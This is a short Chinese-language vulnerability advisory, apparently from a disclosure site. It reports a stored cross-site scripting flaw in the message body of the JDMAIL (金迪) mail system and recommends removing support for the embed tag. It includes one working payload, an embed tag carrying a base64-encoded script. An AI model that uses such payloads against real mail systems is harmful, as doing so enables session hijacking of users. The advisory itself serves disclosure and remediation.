金迪邮件系统 邮件正文 存储型XSS漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

###0x01漏洞简介 JDMAIL金迪邮件系统在邮件正文处存在存储型的XSS漏洞。 ###0x02漏洞详情 xss漏洞一:邮件正文测试代码: ``` <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgvS2V5Ym9hcmQvKTwvc2NyaXB0Pgo="></embed> ``` ![](https://images.seebug.org/contribute/5a7a149c-80c7-4a23-8f67-e2b6a9e92317) 漏洞二打印预览 ![](https://images.seebug.org/contribute/63b1b5e2-5bc8-492e-8233-0adba886acab) ###0x03修复方案 取消对html5标签embed的支持。

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息